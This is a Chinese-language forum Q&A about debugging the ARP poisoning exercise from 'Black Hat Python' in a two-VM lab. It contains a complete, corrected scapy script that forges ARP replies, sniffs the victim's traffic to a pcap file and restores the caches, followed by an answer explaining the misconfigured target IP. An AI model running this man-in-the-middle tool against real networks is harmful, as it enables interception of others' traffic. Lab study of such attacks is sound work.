在Justin Seitz的《Black Hat Python》一书的第四章中,有一节详细介绍了如何使用scapy进行ARP投毒。 我在获取目标机器IP对应的MAC地址时遇到了问题。 我使用Kali虚拟机作为攻击机器,Win 7虚拟机作为目标机器。
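# ARP cache poisoning exercise from Black Hat Python (chapter 4), as used in an
# isolated two-VM lab: poison the target's and the gateway's ARP caches, capture
# the target's traffic to arper.pcap, then put the real MAC addresses back.
#
# Every packet sent here is an unsolicited ARP reply (op=2). That is the
# pattern Dynamic ARP Inspection on a switch, static ARP entries, or an
# arpwatch-style monitor will reject or flag.
#
# Written for Python 2; the single-argument print(...) calls also parse on
# Python 3.
from scapy.all import *
import os
import signal
import sys
import threading
import time  # needed by time.sleep() in poison_target; the original never imported it

interface = "eth0"
# NOTE(review): 10.0.2.15 is the inet address that ifconfig reports for this
# Kali machine's own eth0. A host does not answer its own ARP who-has
# broadcast, so get_mac(target_ip) times out and returns None, which is the
# "[!!!] Failed to get target MAC" failure. Set this to the Win 7 VM's address
# and confirm with ping that the two VMs share a network segment.
target_ip = "10.0.2.15"
gateway_ip = "10.0.2.2"
packet_count = 1000


def restore_target(gateway_ip, gateway_mac, target_ip, target_mac):
    """Re-announce the genuine IP-to-MAC pairs so both ARP caches are corrected.

    Sends five ARP replies in each direction, then raises SIGINT in this
    process so the main thread is interrupted.
    """
    print("[*} Restoring target...")
    # Broadcast the gateway's real MAC for the gateway IP.
    send(ARP(op=2, psrc=gateway_ip, pdst=target_ip,
             hwdst="ff:ff:ff:ff:ff:ff", hwsrc=gateway_mac), count=5)
    # Tell the gateway the target's real MAC (the original spelled this `Arp`,
    # which is a NameError).
    send(ARP(op=2, psrc=target_ip, pdst=gateway_ip, hwsrc=target_mac), count=5)
    os.kill(os.getpid(), signal.SIGINT)


def get_mac(ip_address):
    """Return the MAC address that answers an ARP request for ip_address.

    Broadcasts a who-has request (2 s timeout, up to 10 retries) and returns
    the Ethernet source of the first answer, or None when nothing answers.
    """
    responses, unanswered = srp(
        Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst=ip_address),
        timeout=2, retry=10)
    for sent, received in responses:
        return received[Ether].src
    return None


def poison_target(gateway_ip, target_mac):
    """Send forged ARP replies to target and gateway every two seconds.

    Reads target_ip and gateway_mac from module scope, because only
    gateway_ip and target_mac are passed in.
    """
    # Reply aimed at the target, claiming the gateway's IP address.
    target_reply = ARP()
    target_reply.op = 2
    target_reply.psrc = gateway_ip
    target_reply.pdst = target_ip
    target_reply.hwdst = target_mac  # original had the typo `posion_target`

    # Reply aimed at the gateway, claiming the target's IP address.
    gateway_reply = ARP()
    gateway_reply.op = 2
    gateway_reply.psrc = target_ip
    gateway_reply.pdst = gateway_ip
    gateway_reply.hwdst = gateway_mac

    print("[*] Beginning the ARP poison. [CTRL-C to stop]")
    while True:
        try:
            send(target_reply)
            send(gateway_reply)
            time.sleep(2)
        except KeyboardInterrupt:
            # restore_target takes four arguments; the original passed two.
            restore_target(gateway_ip, gateway_mac, target_ip, target_mac)
            print("[*] ARP poison attack finished.")
            return


conf.iface = interface
conf.verb = 0  # silence scapy's per-packet output

print("[*] Setting up %s" % interface)

gateway_mac = get_mac(gateway_ip)
if gateway_mac is None:
    print("[!!!] Failed to get gateway MAC. Exiting.")
    sys.exit(0)
else:
    print("[*] Gateway %s is at %s" % (gateway_ip, gateway_mac))

target_mac = get_mac(target_ip)
if target_mac is None:
    print("[!!!] Failed to get target MAC. Exiting.")
    sys.exit(0)
else:
    print("[*] Target %s is at %s" % (target_ip, target_mac))

# The original passed the misspelled name `posion_target` here (NameError).
poison_thread = threading.Thread(target=poison_target,
                                 args=(gateway_ip, target_mac))
poison_thread.start()

# NOTE(review): the poisoning thread is never stopped before restore_target
# runs, so a later forged reply can overwrite the corrected cache entries.
# Stop and join the thread before restoring if the lab must be left clean.
try:
    print("[*] Starting sniffer for %d packets" % packet_count)
    bpf_filter = "ip host %s" % target_ip
    packets = sniff(count=packet_count, filter=bpf_filter, iface=interface)
    wrpcap('arper.pcap', packets)
    restore_target(gateway_ip, gateway_mac, target_ip, target_mac)
except KeyboardInterrupt:
    restore_target(gateway_ip, gateway_mac, target_ip, target_mac)
    sys.exit(0)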
攻击机:
root@kali:~/Documents# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.0.2.15  netmask 255.255.255.0  broadcast 10.0.2.255
        inet6 fe80::a00:27ff:fe81:b1df  prefixlen 64  scopeid 0x20<link>
        ether 08:00:27:81:b1:df  txqueuelen 1000  (Ethernet)
        RX packets 101529  bytes 101906744 (97.1 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 34775  bytes 3530239 (3.3 MiB)
        TX errors 0  dropped 0  overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 218  bytes 13972 (13.6 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 218  bytes 13972 (13.6 KiB)
        TX errors 0  dropped 0  overruns 0  carrier 0  collisions 0
输出:
root@kali:~/Documents# sudo python arper.py
[*] Setting up eth0
[*] Gateway 10.0.2.2 is at 52:54:00:12:35:02
[!!!] Failed to get target MAC. Exiting.
你把Kali(攻击机器)自己的IP(10.0.2.15)用作了target_ip。 主机不会应答自己发出的ARP请求,所以get_mac返回None。 Win虽然运行在同一台物理机上,但它是一台虚拟机,而每台虚拟机通常都有自己的IP( https://www.quora.com/Do-virtual-machines-have-their-own-IP )
甚至无法确定虚拟机里的Win是否自动处于同一个网络中。 请在同一个/24网络(即10.0.2.x/24,将x替换为具体数值)中为Win虚拟机和Kali分配静态IP,参见 https://serverfault.com/questions/839443/
编码器是正确的:首先用ping检查两台机器之间的网络是否连通